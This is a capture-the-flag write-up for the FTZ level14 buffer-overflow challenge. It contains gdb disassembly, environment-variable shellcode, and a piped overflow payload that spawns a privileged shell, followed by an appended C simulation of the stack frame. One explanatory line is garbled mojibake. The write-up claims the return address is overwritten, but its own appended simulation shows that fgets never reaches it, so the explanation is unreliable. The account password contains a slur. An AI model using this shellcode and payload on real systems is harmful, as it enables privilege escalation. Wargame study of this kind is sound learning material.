[FTZ] level14 Solution


Problem

Account: level14/what that nigga want?

hint

From level 14 onward, the problems are taken directly from mainsource.
These problems are the most effective way to learn
buffer overflows and format strings.

#include <stdio.h>
#include <stdlib.h>   /* system() */
#include <unistd.h>   /* setreuid() */

int main(void)
{
  int crap;
  int check;              /* never initialised: only an overflow from buf can set it */
  char buf[20];
  fgets(buf, 45, stdin);  /* reads up to 44 bytes into a 20-byte buffer */
  if (check == 0xdeadbeef)
   {
     setreuid(3095, 3095);
     system("/bin/sh");
   }
  return 0;
}


Solution

Just as in level 13, overwriting the ret address also overwrites the check and crap variables along the way. Since check is the value the program verifies, we just need to be careful about what we overwrite check with.

First, analyze the memory layout.

[level14@ftz level14]$ gdb -q attackme
(gdb) set disass intel
(gdb) disass main
Dump of assembler code for function main:
0x08048490 <main+0>:    push   ebp
0x08048491 <main+1>:    mov    ebp,esp
0x08048493 <main+3>:    sub    esp,0x38
0x08048496 <main+6>:    sub    esp,0x4
0x08048499 <main+9>:    push   ds:0x8049664
0x0804849f <main+15>:   push   0x2d
0x080484a1 <main+17>:   lea    eax,[ebp-56]   // buf is at ebp-56
0x080484a4 <main+20>:   push   eax
0x080484a5 <main+21>:   call   0x8048360 <fgets>
0x080484aa <main+26>:   add    esp,0x10
0x080484ad <main+29>:   cmp    DWORD PTR [ebp-16],0xdeadbeef // check is at ebp-16
0x080484b4 <main+36>:   jne    0x80484db <main+75>
0x080484b6 <main+38>:   sub    esp,0x8
0x080484b9 <main+41>:   push   0xc17
0x080484be <main+46>:   push   0xc17
0x080484c3 <main+51>:   call   0x8048380 <setreuid>
0x080484c8 <main+56>:   add    esp,0x10
0x080484cb <main+59>:   sub    esp,0xc
0x080484ce <main+62>:   push   0x8048548
0x080484d3 <main+67>:   call   0x8048340 <system>
0x080484d8 <main+72>:   add    esp,0x10
0x080484db <main+75>:   leave
0x080484dc <main+76>:   ret
0x080484dd <main+77>:   lea    esi,[esi]

The memory layout is as follows.

ret(4)
ebp(4)
dummy + crap (12)
check(4)  // ebp-16
dummy(20) // the gap between the addresses of buf and check
buf(20)   // ebp-56

ํ™˜๊ฒฝ๋ณ€์ˆ˜์— ์‰˜์ฝ”๋“œ๋ฅผ ๋“ฑ๋กํ•˜๊ณ , ํ™˜๊ฒฝ๋ณ€์ˆ˜์˜ ์ฃผ์†Œ๋ฅผ ์•Œ์•„๋ƒ…๋‹ˆ๋‹ค.

[level14@ftz tmp]$ export SHELLCODE=$(python -c 'print("\x90"*30+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80")')
[level14@ftz tmp]$ echo 'int main(){printf("%p\n",getenv("SHELLCODE"));}' >> env.c
[level14@ftz tmp]$ gcc -o env env.c
[level14@ftz tmp]$ ./env
0xbffffc6d

Run the program and overwrite the ret address.

  1. buf + dummy: 40 bytes
  2. check -> 0xdeadbeef
  3. dummy + crap + ebp: 16 bytes
  4. change the return address to 0xbffffc6d

[level14@ftz level14]$ (python -c'print("A"*40+"\xef\xbe\xad\xde"+"A"*16+"\x6d\xfc\xff\xbf")';cat) | ./attackme

id
uid=3095(level15) gid=3094(level14) groups=3094(level14)

my-pass
Level15 Password is "guess what".
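The stack layout above, worked through as an added example that is not part of the original writeup: a model of main()'s 64-byte frame (from buf up to the return address) is fed the writeup's input through the same fgets(buf, 45, stream) call the binary makes, and each 4-byte slot is then inspected. Because fgets stores at most 44 bytes, the input fills buf and check exactly but never reaches the saved ebp or the return address, so the shell in this level comes from the check comparison alone; the frame, payload and slot_* names are this example's own.

```c
#include <stdio.h>
#include <string.h>
#include <stdint.h>

/* main()'s frame as recovered from the disassembly, offsets counted from buf
 * (ebp-56): check at ebp-16, saved ebp at ebp, return address right above it. */
#define FRAME_SIZE    64
#define OFF_CHECK     40     /* (ebp-16) - (ebp-56) */
#define OFF_SAVED_EBP 56
#define OFF_RET       60
#define FGETS_N       45     /* the 0x2d pushed before call fgets */
#define UNTOUCHED     0xCC   /* marker for bytes the read never writes */
static unsigned char frame[FRAME_SIZE];   /* model of the 64 bytes from buf to ret */

/* Constructed copy of the writeup's input: 40 filler bytes, 0xdeadbeef,
 * 16 filler bytes, the address 0xbffffc6d, and the newline print() appends. */
static const unsigned char payload[] =
    "AAAAAAAAAA" "AAAAAAAAAA" "AAAAAAAAAA" "AAAAAAAAAA" "\xef\xbe\xad\xde"
    "AAAAAAAAAA" "AAAAAA" "\x6d\xfc\xff\xbf" "\n";

/* Push the input through the same fgets(buf, 45, stream) call main() makes,
 * with the frame pre-filled with the marker byte. Returns 1 on success. */
static int simulate_read(const unsigned char *in, size_t len)
{
    memset(frame, UNTOUCHED, FRAME_SIZE);
    FILE *f = tmpfile();                          /* stands in for stdin */
    if (!f || fwrite(in, 1, len, f) != len) { if (f) fclose(f); return 0; }
    rewind(f);
    char *r = fgets((char *)frame, FGETS_N, f);   /* at most 44 bytes, then a NUL */
    fclose(f);
    return r != NULL;
}

/* Little-endian 32-bit value of the 4-byte slot at offset off. */
static uint32_t slot_value(size_t off)
{
    return (uint32_t)frame[off] | (uint32_t)frame[off + 1] << 8 |
           (uint32_t)frame[off + 2] << 16 | (uint32_t)frame[off + 3] << 24;
}

/* 1 if all four bytes of the slot still carry the marker: the read never got there. */
static int slot_untouched(size_t off) { return slot_value(off) == 0xCCCCCCCCu; }

int main(void)
{
    if (!simulate_read(payload, sizeof payload - 1)) return 1;
    printf("check = 0x%08x, ret %s, NUL terminator at buf+%d\n", (unsigned)slot_value(OFF_CHECK),
           slot_untouched(OFF_RET) ? "untouched" : "overwritten", FGETS_N - 1);
    return 0;
}
```

The terminator lands at buf+44, i.e. ebp-12, inside the dummy/crap area, and everything from the saved ebp upward keeps its marker.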
